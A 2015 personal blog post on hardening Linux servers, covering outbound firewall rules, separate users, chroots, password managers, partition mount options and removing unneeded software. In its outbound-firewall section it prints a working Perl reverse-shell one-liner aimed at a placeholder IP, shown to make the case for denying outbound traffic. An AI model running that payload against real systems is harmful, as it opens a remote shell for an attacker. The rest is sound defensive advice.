Saturday, June 20, 2015

Locking Shit Down

I don't know if it's just me, but it seems like there is an awful lot of funny stuff going on in the cloud as of late. After the Sony hacks, I predicted that 2015 would be a bad year for cyber security. Looks like I was right about that, considering every branch of our federal government was hacked recently. Now, I manage a few servers myself, and I've had my share of compromises too. But the last few months have been utterly ridiculous. I have reinstalled my personal system four times since January because I suspected some malware had snuck on board, and I'm getting really sick of doing that. Today I reinstalled & rebuilt yet another server from scratch, which is a major pain in the ass.

This is the server I'd been running a Kippo SSH honeypot on. I had Kippo running for about a month, and from that experience I cannot recommend that anyone run a honeypot on a server that hosts other services. It's just not worth the risk. Yeah, Kippo is relatively secure, and sure, it's an emulated shell that is not capable of doing much, but that does not mean it can't be hacked. In the end, if nothing else, it's just another open port to worry about.

Run Public Services On Separate Systems

This should be obvious, but let's narrow the definition of public. When you have a box running a VPN server, BitTorrent client, web server, honeypot, and tor relay... well, things can get messy. It is definitely more secure to dedicate a system to a particular task and manage several smaller systems than it is to run everything on one big powerful box and attempt to lock it all down. In the age of cheap & abundant virtualization, there's no reason not to segregate your servers. My advice is to at least keep the public services (BitTorrent, web server, tor, etc.) on a different server than your personal cloud storage box, or what-have-you. Consider a BitTorrent client for a moment. It is generally seen as a fairly benign service to run (all legal issues aside), and overall, clients like Transmission have stood the test of time. But BitTorrent clients connect with tens of thousands of different hosts every day, and all it takes is a few bad packets and a zero-day exploit to ruin your day. Torrent clients also seem to be written specifically to evade firewalls, as they work just fine under very strict rules. You don't even need to open a port; the client will figure out a way to connect to its peers, wherever they are.

Deny Outbound Connections

In this day and age, it's no longer sufficient to leave your firewall's outbound policy at ACCEPT while dropping inbound connections. Why? Imagine you're running a webserver of some sort, and somebody manages to find an exploit that allows them to upload even one line of rogue PHP (this happens all the time). For example, if the following manages to get written to a file on your server, and your outbound policy is set to ACCEPT, the attacker will get a shell with whatever privileges the server user has:


perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"1.2.3.4:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If your system is not fully up to date (or even if it is), all it takes is a privilege escalation exploit, or a slight misconfiguration of permissions in the serving directory, and you are screwed. By the way, I tested this on a fresh Ubuntu 14.04 server, running Apache as it is out of the box, with success. Most Linux systems have Perl installed on them, and removing it is a real pain (too many services depend on Perl, and besides, Perl is cool!). Denying outbound connections would prevent this from working, and chrooting Apache as well would severely limit the attack vector. If you think this is paranoia, try googling something like "inurl:/r00t.php".

For locking down an Apache server that only serves clients on a particular private subnet, you could use something like this:

$IPT -A INPUT -i eth0 -s 10.0.0.0/24 -d 10.0.0.1 -p tcp -m tcp --dport 80 -j ACCEPT
$IPT -A OUTPUT -o eth0 -s 10.0.0.1 -d 10.0.0.0/24 -p tcp --sport 80 -j ACCEPT
$IPT -A OUTPUT -o eth0 -m owner --uid-owner www-data -j REJECT
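
To take the idea further, you can flip the default outbound policy to DROP and explicitly allow only the traffic the box actually needs. Here's a minimal sketch along the same lines, assuming eth0 and a resolver at 10.0.0.53 (both placeholders, adjust to taste):

# default-deny outbound; only let out what the box actually needs
$IPT -P OUTPUT DROP
$IPT -A OUTPUT -o lo -j ACCEPT
# replies to connections we already accepted above
$IPT -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# DNS to our own resolver only
$IPT -A OUTPUT -o eth0 -p udp -d 10.0.0.53 --dport 53 -j ACCEPT
# outbound HTTP/HTTPS for package updates, restricted to root
$IPT -A OUTPUT -o eth0 -p tcp -m multiport --dports 80,443 -m owner --uid-owner root -j ACCEPT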
 


Run Everything as a Different User

This should be number one. Considering the example above, when an attacker manages to get a shell on your system, they are limited to the resources running as and owned by that user. If you implement proper access control policies, then even if someone manages to get a shell, they will not be able to access the files and programs owned by other users. Our old friend Mr. Meterpreter is a perfect example of how privilege separation could have saved a lot of systems from rape and pillage. When someone manages to get a Meterpreter trojan onto your Windows system, it is game over. Your webcam, microphone, 'My Documents' folder, and usually most of your C:\ drive are accessible to you, the user. Yeah, I know that's just how personal computers work, but it's also a good reason to use Linux and lock your shit down. The functionality of Metasploit's Meterpreter on a Linux machine is much, much more limited than it is on a Windows system, mostly because of privilege separation.
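
To make that concrete, here's a hypothetical example of giving a daemon its own locked-down system account instead of running it as root or as your login user ('mydaemon' and its paths are made up; substitute your own service):

# create a system account with no login shell and its own home
useradd -r -s /usr/sbin/nologin -d /var/lib/mydaemon mydaemon
mkdir -p /var/lib/mydaemon
chown mydaemon:mydaemon /var/lib/mydaemon
chmod 750 /var/lib/mydaemon
# start the daemon under that account instead of root
sudo -u mydaemon /usr/local/bin/mydaemon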

Chroot Everything Else

Another priceless tip is to chroot whatever services are open to the world. I don't understand why chrooting is not used more often. A strong chroot combined with a strict firewall should be enough to stop most attackers before they can do any real harm. Chroots are basically 'jails' for programs: a directory owned by root, containing an entire miniature unix filesystem. So, for a tor chroot, you'd have for instance '/chroot' owned by root, and then '/chroot/tor' owned by a user with limited privileges and no valid shell. Then you would use the ldd command to figure out which libraries tor depends on, and copy them all into the '/chroot/tor/' directory, so you'd end up with '/chroot/tor/var', '/chroot/tor/lib', '/chroot/tor/etc', and so on. If a hacker manages to break into the chrooted service, they can do as much damage as they want to tor, but nothing else. That is at least the theory.
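
In rough strokes, building the jail might look like this. The '/usr/bin/tor' path and the unprivileged 'tor' user are assumptions, and a real tor chroot also needs its config, data directory, and a few device nodes copied in:

# skeleton of the jail
mkdir -p /chroot/tor/{bin,etc,var,lib,lib64}
cp /usr/bin/tor /chroot/tor/bin/
# copy every shared library the binary links against
for lib in $(ldd /usr/bin/tor | grep -o '/[^ ]*'); do
    mkdir -p "/chroot/tor$(dirname "$lib")"
    cp "$lib" "/chroot/tor$lib"
done
# run it confined to the jail, as the unprivileged user
chroot --userspec=tor:tor /chroot/tor /bin/tor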

Edit: A note on chroots. A chroot can easily be created for most occasions with the program Sandfox, which is written entirely in bash, so it works on all Linux systems and possibly even on Macs. It's perfect for chrooting Firefox, which will drastically improve your defenses against client-side attacks on desktop systems.

Use a Password Manager

Keyloggers are pretty useless when you don't type. Password managers are excellent because you can generate, copy, and then paste a password where it's needed, and never have to type the password itself. Yes, there are some advanced trojans out there that can read the clipboard (and some not-so-advanced ones on Android systems...), but generally this is a really good move. It's also a lot easier to have /dev/urandom come up with your passwords than it is to invent your own totally random, 40-character strings. If at all possible, don't even use passwords, or use some kind of two-factor authentication system. Even in 2015, weak passwords are still one of the most common mistakes leading to full system compromise.
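
If you just want /dev/urandom to do the work without a full-blown password manager, something as simple as this spits out a random 40-character string (the character set and length are only a suggestion):

# pull 40 random printable characters out of /dev/urandom
tr -dc 'A-Za-z0-9_!@#%^&*+-' < /dev/urandom | head -c 40; echo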

Use Separate Partitions

This should be a no-brainer, but it's just not. Even the Debian installer still struggles to properly partition a disk with separate /var, /tmp, /usr, /home, and /boot partitions. Usually the installer fails because it does not allocate enough space to the root (/) partition, and the system will not fit on the drive. I really wish someone would fix that. The solution is to partition the drive yourself before you install. Use something like a GParted live disc, because IME the installer's built-in partitioner really sucks. When you have, for example, /tmp on its own partition, you can set options like nodev, nosuid, and noexec for that partition. This goes a hell of a long way toward keeping your system secure. /tmp is generally world readable, writable, and executable, and is almost always where a hacker will first try to download his malware after getting a shell.
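
Once /tmp and friends live on their own partitions, the restrictive mount options go in /etc/fstab. Something along these lines (the UUIDs are placeholders for your own devices):

# /etc/fstab excerpts
UUID=aaaaaaaa-0000  /tmp   ext4  defaults,nodev,nosuid,noexec  0  2
UUID=bbbbbbbb-0000  /var   ext4  defaults,nodev,nosuid         0  2
UUID=cccccccc-0000  /home  ext4  defaults,nodev,nosuid         0  2

Fair warning: noexec on /tmp can occasionally break package installs that run scripts out of /tmp; a quick 'mount -o remount,exec /tmp' before the upgrade (and a remount with noexec afterwards) is the usual workaround.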

Uninstall/Disable Whatever You Don't Need

The more applications running on any given system, the more code there is to mess with, and hence more attack vectors. If you don't need a print server, get rid of CUPS! If you don't use RPC services, get rid of rpcbind. If you don't need service discovery, get rid of avahi. You get the point. Oh, one last thing... if you don't compile your own code, uninstall the compilers! It's often easier to upload a text file than a binary file, particularly in the web app world.
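
On a Debian or Ubuntu box that cleanup might look something like this (check what's actually listening, and what depends on each package, before purging anything):

# see what's listening first
netstat -tulpn
# then drop the services you don't need
apt-get purge cups rpcbind avahi-daemon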

Edit: Personally, I need the compilers, so instead of removing them, you can just limit their execution to the superuser:

~: dpkg --list | grep compiler
ii  g++                           4:4.9.2-2ubuntu2   amd64   GNU C++ compiler
ii  g++-4.9                       4.9.2-10ubuntu13   amd64   GNU C++ compiler
ii  gcc                           4:4.9.2-2ubuntu2   amd64   GNU C compiler
ii  gcc-4.9                       4.9.2-10ubuntu13   amd64   GNU C compiler


~: cd /usr/bin
~: chmod 750 g++-4.9  gcc-4.9
